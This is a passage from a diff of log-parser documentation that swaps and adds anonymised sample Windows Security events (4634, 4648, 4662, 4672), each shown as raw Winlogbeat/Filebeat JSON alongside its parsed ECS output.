\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\", \"TargetLogonId\": \"0x0\"}, \"record_id\": 8884538, \"api\": \"wineventlog\", \"opcode\": \"Info\"}, \"host\": {\"hostname\": \"host01\", \"id\": \"abcdefgh-1234-5678-abcd-efgh12345678\", \"ip\": [\"8.8.8.8\"], \"name\": \"host01\", \"mac\": [\"00-11-22-33-44-55\"], \"architecture\": \"x86_64\", \"os\": {\"build\": \"20348.2031\", \"version\": \"10.0\", \"name\": \"Windows Server 2022 Standard\", \"family\": \"windows\", \"kernel\": \"10.0.20348.2031 (WinBuild.160101.0800)\", \"type\": \"windows\", \"platform\": \"windows\"}}, \"log\": {\"level\": \"information\"}, \"ecs\": {\"version\": \"8.0.0\"}, \"agent\": {\"type\": \"winlogbeat\", \"ephemeral_id\": \"7ecf606a-ee47-4796-a223-4e6bb827233d\", \"id\": \"65ede6f4-4783-4792-8dc0-8364bc33b7bd\", \"version\": \"8.10.4\", \"name\": \"HOST01\"}}", + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", "event": { - "action": "Process Creation", - "code": "4688", + "action": "Logoff", + "code": "4634", "kind": "event", "module": "security", - "original": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.", "outcome": "success", "provider": "Microsoft-Windows-Security-Auditing" }, - "@timestamp": "2023-11-09T08:43:51.462000Z", + "@timestamp": "2024-11-12T08:42:47.895000Z", "action": { - "id": 4688, + "id": 4634, "outcome": "success", "properties": { - "CommandLine": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", - "MandatoryLabel": "S-1-2-3", - "NewProcessId": "0x1d9c", - "NewProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", - "ParentProcessName": "C:\\\\Windows\\\\System32\\\\services.exe", - "ProcessId": "0x2a0", - "SubjectDomainName": "COMPANY", - "SubjectLogonId": "0x3e7", - "SubjectUserName": "HOST01$", - "SubjectUserSid": "S-1-1-1", - "TargetDomainName": "-", - "TargetLogonId": "0x0", - "TargetUserName": "-", - "TargetUserSid": "S-1-0-0", - "TokenElevationType": "%%1936" + "LogonType": "3", + "TargetDomainName": "J_DOE", + "TargetLogonId": "0x5ed35bb6", + "TargetUserName": "ACCOUNT", + "TargetUserSid": "S-1-2-3" } }, "agent": { - "ephemeral_id": "7ecf606a-ee47-4796-a223-4e6bb827233d", - "id": "65ede6f4-4783-4792-8dc0-8364bc33b7bd", - "name": "HOST01", - "type": "winlogbeat", - "version": "8.10.4" + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" }, "host": { "architecture": "x86_64", - "hostname": "host01", - "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "hostname": "pc01", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", "ip": [ - "8.8.8.8" + "1.2.3.4", + "5.6.7.8" ], "mac": [ "00-11-22-33-44-55" ], - "name": "host01", + "name": "pc01", "os": { - "build": "20348.2031", + "build": "17763.6414", "family": "windows", - "kernel": "10.0.20348.2031 (WinBuild.160101.0800)", - "name": "Windows Server 2022 Standard", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", "platform": "windows", "type": "windows", "version": "10.0" @@ -1945,65 +2134,1113 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "level": "information" }, - "process": { - "command_line": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", - "executable": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", - "name": "WmiApSrv.exe", - "parent": { - "executable": "C:\\\\Windows\\\\System32\\\\services.exe", - "name": "services.exe", - "pid": 672 - }, - "pid": 7580 - }, "related": { - "hosts": [ - "host01" - ], - "ip": [ - "8.8.8.8" - ], + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "J_DOE", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "J_DOE", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.jdoe.com", + "event_id": "4634", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x5ed35bb6", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "15983780774", + "task": "Logoff" + } + } + + ``` + + +=== "security_event_4648.json" + + ```json + + { + "message": "{\"log\": {\"level\": \"information\"}, \"message\": \"A logon was attempted using explicit credentials.\\\\n\\\\nSubject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-2-3\\\\n\\\\tAccount Name:\\\\t\\\\tSYSTEM\\\\n\\\\tAccount Domain:\\\\t\\\\tDOMAIN\\\\n\\\\tLogon ID:\\\\t\\\\t0x41C1B034B\\\\n\\\\tLogon GUID:\\\\t\\\\t{00000000-0000-0000-0000-000000000000}\\\\n\\\\nAccount Whose Credentials Were Used:\\\\n\\\\tAccount Name:\\\\t\\\\taccount\\\\n\\\\tAccount Domain:\\\\t\\\\tcompany\\\\n\\\\tLogon GUID:\\\\t\\\\t{00000000-0000-0000-0000-000000000000}\\\\n\\\\nTarget Server:\\\\n\\\\tTarget Server Name:\\\\tTARGET.company.com\\\\n\\\\tAdditional Information:\\\\tTARGET.company.com\\\\n\\\\nProcess Information:\\\\n\\\\tProcess ID:\\\\t\\\\t0x8314\\\\n\\\\tProcess Name:\\\\t\\\\tD:\\\\\\\\Program Files (x86)\\\\\\\\Process\\\\\\\\Test\\\\\\\\processname.exe\\\\n\\\\nNetwork Information:\\\\n\\\\tNetwork Address:\\\\t8.8.8.8\\\\n\\\\tPort:\\\\t\\\\t\\\\t12345\\\\n\\\\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\\\\u2019s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.\", \"type\": \"R2\", \"fields\": {\"gdp-indice\": \"l-serve\", \"gdp-parc\": \"defaut\", \"gdp-config\": \"server\", \"gdp-version-sysmon\": 15, \"gdp-sousparc\": \"prod\", \"gdp-version\": \"2.8\", \"gdp-version-winlogbeat\": 3.4}, \"ecs\": {\"version\": \"8.0.0\"}, \"agent\": {\"name\": \"WB-SRV-HOST01\", \"type\": \"winlogbeat\", \"version\": \"8.8.2\", \"ephemeral_id\": \"06ad3222-a4be-4b59-9958-5f9a657ea9f1\", \"id\": \"2c0cd63b-3836-4620-9eb8-13202bd370a3\"}, \"fields.gdp-redis\": \"2\", \"event\": {\"provider\": \"Microsoft-Windows-Security-Auditing\", \"kind\": \"event\", \"code\": \"4648\", \"action\": \"Logon\", \"created\": \"2023-11-09T09:05:15.197Z\", \"outcome\": \"success\"}, \"winlog\": {\"event_id\": \"4648\", \"keywords\": [\"Audit Success\"], \"provider_guid\": \"{54849625-5478-4994-A5BA-3E3B0328C30D}\", \"event_data\": {\"SubjectUserName\": \"SYSTEM\", \"IpPort\": \"12345\", \"TargetInfo\": \"TARGET.company.com\", \"TargetLogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"TargetUserName\": \"account\", \"TargetServerName\": \"TARGET.company.com\", \"ProcessName\": \"D:\\\\\\\\Program Files (x86)\\\\\\\\Process\\\\\\\\Test\\\\\\\\processname.exe\", \"SubjectUserSid\": \"S-1-2-3\", \"IpAddress\": \"8.8.8.8\", \"TargetDomainName\": \"company\", \"SubjectDomainName\": \"DOMAIN\", \"ProcessId\": \"0x8314\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"SubjectLogonId\": \"0x41c1b034b\"}, \"process\": {\"pid\": 848, \"thread\": {\"id\": 22916}}, \"provider_name\": \"Microsoft-Windows-Security-Auditing\", \"computer_name\": \"HOST01.company.com\", \"opcode\": \"Info\", \"task\": \"Logon\", \"channel\": \"Security\", \"api\": \"wineventlog\", \"record_id\": 8500947825, \"activity_id\": \"{7E156DC4-0D77-0008-C56D-157E770DDA01}\"}, \"@timestamp\": \"2023-11-09T09:05:14.415Z\", \"host\": {\"name\": \"HOST01\", \"id\": \"abcdefgh-1234-5678-abcd-efgh12345678\", \"mac\": [\"00-00-00-00-00-00-00-E0\", \"00-11-22-33-44-55\"], \"architecture\": \"x86_64\", \"os\": {\"platform\": \"windows\", \"version\": \"10.0\", \"name\": \"Windows Server 2016 Standard\", \"build\": \"14393.6351\", \"kernel\": \"10.0.14393.6343 (rs1_release.230913-1727)\", \"type\": \"windows\", \"family\": \"windows\"}, \"hostname\": \"HOST01\", \"ip\": [\"1.2.3.4\", \"fe80::abcd:123:456\"]}, \"event_ingest_logstash\": \"2023-11-09T09:05:14.912238Z\", \"fields.gdp-logstash\": \"5\", \"@version\": \"1\"}", + "event": { + "action": "Logon", + "code": "4648", + "kind": "event", + "module": "security", + "original": "A logon was attempted using explicit credentials.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tSYSTEM\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x41C1B034B\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nAccount Whose Credentials Were Used:\\n\\tAccount Name:\\t\\taccount\\n\\tAccount Domain:\\t\\tcompany\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nTarget Server:\\n\\tTarget Server Name:\\tTARGET.company.com\\n\\tAdditional Information:\\tTARGET.company.com\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x8314\\n\\tProcess Name:\\t\\tD:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe\\n\\nNetwork Information:\\n\\tNetwork Address:\\t8.8.8.8\\n\\tPort:\\t\\t\\t12345\\n\\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\\u2019s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2023-11-09T09:05:14.415000Z", + "action": { + "id": 4648, + "outcome": "success", + "properties": { + "IpAddress": "8.8.8.8", + "IpPort": "12345", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "ProcessId": "0x8314", + "ProcessName": "D:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x41c1b034b", + "SubjectUserName": "SYSTEM", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "company", + "TargetInfo": "TARGET.company.com", + "TargetLogonGuid": "{00000000-0000-0000-0000-000000000000}", + "TargetServerName": "TARGET.company.com", + "TargetUserName": "account" + } + }, + "agent": { + "ephemeral_id": "06ad3222-a4be-4b59-9958-5f9a657ea9f1", + "id": "2c0cd63b-3836-4620-9eb8-13202bd370a3", + "name": "WB-SRV-HOST01", + "type": "winlogbeat", + "version": "8.8.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "HOST01", + "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "ip": [ + "1.2.3.4", + "fe80::abcd:123:456" + ], + "mac": [ + "00-00-00-00-00-00-00-E0", + "00-11-22-33-44-55" + ], + "name": "HOST01", + "os": { + "build": "14393.6351", + "family": "windows", + "kernel": "10.0.14393.6343 (rs1_release.230913-1727)", + "name": "Windows Server 2016 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "D:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe", + "name": "processname.exe", + "pid": 33556 + }, + "related": { + "hosts": [ + "HOST01" + ], + "ip": [ + "1.2.3.4", + "8.8.8.8", + "fe80::abcd:123:456" + ], + "user": [ + "account" + ] + }, + "source": { + "address": "8.8.8.8", + "ip": "8.8.8.8", + "port": 12345 + }, + "user": { + "domain": "company", + "effective": { + "domain": "company", + "name": "account" + }, + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "company", + "name": "account" + } + }, + "winlog": { + "activity_id": "{7e156dc4-0d77-0008-c56d-157e770dda01}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.company.com", + "event_id": "4648", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x41c1b034b" + }, + "opcode": "Info", + "process": { + "pid": 848, + "thread": { + "id": 22916 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "8500947825", + "task": "Logon" + } + } + + ``` + + +=== "security_event_4662.json" + + ```json + + { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } + + ``` + + +=== "security_event_4672.json" + + ```json + + { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de 